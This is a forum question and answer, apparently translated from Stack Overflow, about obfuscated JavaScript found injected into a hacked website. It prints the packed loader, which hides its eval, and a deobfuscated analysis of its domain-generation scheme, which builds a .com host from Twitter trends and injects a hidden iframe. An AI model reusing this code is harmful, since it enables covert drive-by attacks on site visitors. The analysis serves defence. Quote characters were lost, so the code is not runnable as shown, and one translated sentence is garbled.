这是危险的 JavaScript 吗?
原标题:Is this dangerous Javascript?
<script>
// Loader for a dictionary-packed payload. Two stages:
//   1. the for-loop expands the compressed text held in `d`;
//   2. the function passed in as `$$` compiles that text and runs it.
// NOTE(review): quote characters appear to have been lost when this page was captured,
// so the literal and the split() argument below are not valid JavaScript as shown.
(function($$) {
    // `d` (and `c`, `t`, `x` in the loop) are assigned without a declaration, so they become globals.
    d = "(@(){ %H=@( +Pw=this;\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz )+#h}\ PD.splice(Vz ),1+VT - 3Vu -+ T +PD 3VU -};Pr={ hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`; :2345678901, / :48271, F :198195254, G :12, CX= };@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\ #p(#M)}Pj=document;#d=window; (C= undefined ; (S=VhaDWDosestnsdlDjfqcq  6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr ),#n("hxDgakDosxsLsJseD6sJDmDj"));PS.appendChild(#m)}@ PH(#q,PB){\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\(#N%#s) 7t(#k){ (N=V; )+#k; !D=V/ ); !v=V; )-VF ); !m=PH( !v, !D); !T= !v% !D 7p(P){\ P /==1?P[0]:P 3  )};@ #e(P){d=new Date( 6D=Vzee );d.setTime((P.as_of-VG )*VG )*VG )*Vezz -*Vezzz -;\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\ String.fromCharCode(i+x+24)});\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n("ETzeeu")+#K+"-"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez ); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz ),+Vee - 0Pu ,u 0Pd ,d; 4u+V, )] 0!#b) 4d+V, )];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,  )+ safetynet ).split(   6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh )+#p(#b).substring(0,#a)+ .com/ +PJ($);Pr[ Z ]=#g;Pf=VBI 1biMU 1UkrZRiMRIA );$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n( X : ` , 
~.getUTC\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz )+P - )) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    // Unpacking loop: c counts down from 50 to 0 over the key string passed to split().
    // Each pass takes the next token from that key (two characters while c >= 10, one
    // character after that), splits d on it, pops the last piece, and re-joins the rest
    // with that piece, so every occurrence of the token is replaced by the text that
    // was stored at the tail of d. The loop body is empty; all work is in the update clause.
    for (c = 50; c; d = (t = d.split( #@PVX`~\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8 .substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    // Hand the unpacked source text to the executor defined below.
    $$(d)
})(function(jsAP) {
    // Executor. jsAP is the unpacked text (a string). Reading the call chain inside-out:
    //   jsA(jsAP)        -> the string's constructor, String
    //   jsAg(String)     -> a wrapper function around String.call
    //   jsA(wrapper)     -> the wrapper's constructor, Function
    //   jsAg(Function)   -> a wrapper that calls Function.call(Function, text)
    //   (...)(jsAP)()    -> builds a function whose body is the text, then invokes it
    // Net effect: Function(jsAP)(). Neither `eval` nor `Function` appears by name, so a
    // scan for those identifiers does not match; a Content-Security-Policy whose
    // script-src omits 'unsafe-eval' refuses this call.
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的主机托管商对此避而不谈,而且这种情况经常发生。 我认为,他们可能在掩盖一次恶意的黑客入侵。

做些什么?

EDIT:

我们更换了主机托管商。

这段代码确实是恶意的,并且被注入到了我们的网站中。 我们的主机托管商正试图掩盖这一点(或许这样,我们就会感到担忧)。

我朋友托管在同一家主机托管商的网站也发生了这种情况。

www.un.org/Depts/DGACM/index_spanish.htm 请注意:

Looks like some obfuscated injection.

最佳回答

让我们去掉工作,把工作推向边缘;它就失去了活力。

AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.

The blob of text after decoding, with the start of analysis:

// Analyst's hand-renamed reconstruction of the unpacked payload. It is partial: helpers
// such as loadJquery and jsn are called or mentioned but not listed here.
// NOTE(review): string quotes were lost when this page was captured, so expressions such
// as join(  ) and $( body ) are not runnable as shown.
// Flow visible in this listing: wait for jQuery, fetch a public trends feed, derive a .com
// host name from one trend name and a date-seeded generator, then append a 2px-high iframe
// to <body>. Because the inputs are a public feed and the date, the same computation can be
// rerun by a defender to enumerate the hosts for blocking. Indicators on an affected page:
// a request to the trends API the site never intended to make, and a near-invisible iframe
// appended to the body.
(function () {
    jsAr = { }; // Stand-in for the sample's token table; in this listing only the Z slot is written (see below).

    /* Returns either first element of jsA, or a joined string. */
    // NOTE(review): the separator argument to join() appears to have been lost in capture.
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join(  )
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    /** Integer division: floor(jsq / jsAB). */
    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    /**
     * Pseudo-random step: advances the shared global state jsN and returns jsN % jss.
     * With the constants set in jst, the update jsAD*(jsN mod jsAm) - jsAT*floor(jsN / jsAm),
     * plus jsAv when the result is not positive, is Schrage's form of a Lehmer
     * (Park-Miller) generator with multiplier 48271 and modulus 2147483647.
     * Must be called after jst, which defines every global read here.
     */
    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    // Seeds the generator: sets the state jsN from jsk and fixes multiplier (jsAD),
    // modulus (jsAv), and the derived quotient (jsAm) and remainder (jsAT). All are globals.
    // NOTE(review): in the packed sample these constants appear to come out of the
    // string-token decoder, in which case `+ jsk` would concatenate rather than add.
    // Confirm before relying on this listing to reproduce the generator's output.
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    // 172800 seconds is exactly 48 hours; the result is scaled to milliseconds for setTime.
    // `d` is assigned without a declaration, so it overwrites a global of that name.
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) *  1000 );
        return d
    }

    // In-place shuffle of jsAz driven by jsx: walks from the last index down to 1 and swaps
    // each slot with the index jsx returns for it. jsv collects those indices but is never read.
    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    // Main routine: once jQuery is available, performs the two feed requests and the iframe insertion.
    function jso($) {
        // Wait until we have jQuery loaded.
        // Retries every 1222 ms for as long as the argument is undefined.
        if (typeof($) ==  undefined ) {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there s a timeout inside).
            // The marker is stored on the jQuery object itself, so it is shared page-wide.
            if (typeof ($.jsAh) !=  undefined ) return;
            $.jsAh = 1;

            // First request: only the feed's as_of timestamp is used, as the clock reference.
            $.getJSON( http://api.twitter.com/1/trends/daily.json?callback=? , function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                // The year 2011 is hard-coded; month and day are appended without zero padding.
                urlTwitterTwoDaysAgo =  http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-  + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                // Start of the current 6-hour block (0, 6, 12 or 18) plus 1; both names receive the same number.
                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Second request, issued once after a 1000 ms delay (setTimeout fires a single time).
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            // Takes the first key that enumeration yields from the trends object.
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr =  0  + twoDigitPrevSixHr; // Normalize to hh
                            // NOTE(review): this assigns twoDigitPrevSixHr rather than jsAd; the packed
                            // text appears to do the same, so it may be a defect in the sample itself.
                            if (jsAd < 10) twoDigitPrevSixHr =  0  + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can t, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr +  :00 ];
                            if (!jsb) jsb = jsy[jsr + jsAd +  :00 ];

                            // Take the entry at index 3 (the fourth trend in the list), e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // [ s ,  i , etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi,   ) +  safetynet ).split(  );

                            // Seed for the generator, built from month, 6-hour block and day of the shifted date.
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            // Label length: jsx(4) is 0..3, so jsa is 10..13 characters.
                            jsa = jsx(4) + 10;
                            // Shuffle the character array with the seeded generator.
                            jsz(jsb);

                            // jsg is the generated URL: the first jsa characters of the shuffled array as a .com host.
                            // In the packed sample the iframe markup is produced by the same token decoder
                            // as the other strings and contains a Z token, so the value stored in jsAr[ Z ]
                            // appears to be what fills the iframe src, which is shown empty below. TODO confirm
                            // against the packed text.
                            jsg =  =http://  + firstElementOrJoined(jsb).substring(0, jsa) +  .com/index.php?tp=001e4bb7b4d7333d ;
                            jsAr[ Z ] = jsg;
                            //

                            // 2px-high iframe wrapper appended to the page body.
                            jsAf =  <divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div> ;
                            $( body ).append(jsAf)
                        } catch (jsAy) {} // Every failure is swallowed, so nothing reaches the console or an error handler.
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

下面是由数组拼接出的一些 URL:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这段代码:

// jsn() looks up each character of its argument in the sample's token table and joins the
// pieces. Per the table in the packed listing, Y -> head, kS -> script and kr -> src, so this
// fragment takes the first <head> element, creates a <script> element, sets its src, and
// appends it. The long token string expands to the jQuery URL shown just below, which is
// requested over plain http.
jsAS = jsAj.getElementsByTagName(jsn( Y ))[0];
jsm = jsAj.createElement(jsn( kS ));
jsm.setAttribute(jsn( kr ), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

会在 <head> 中加入 jQuery 的 script 标签:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>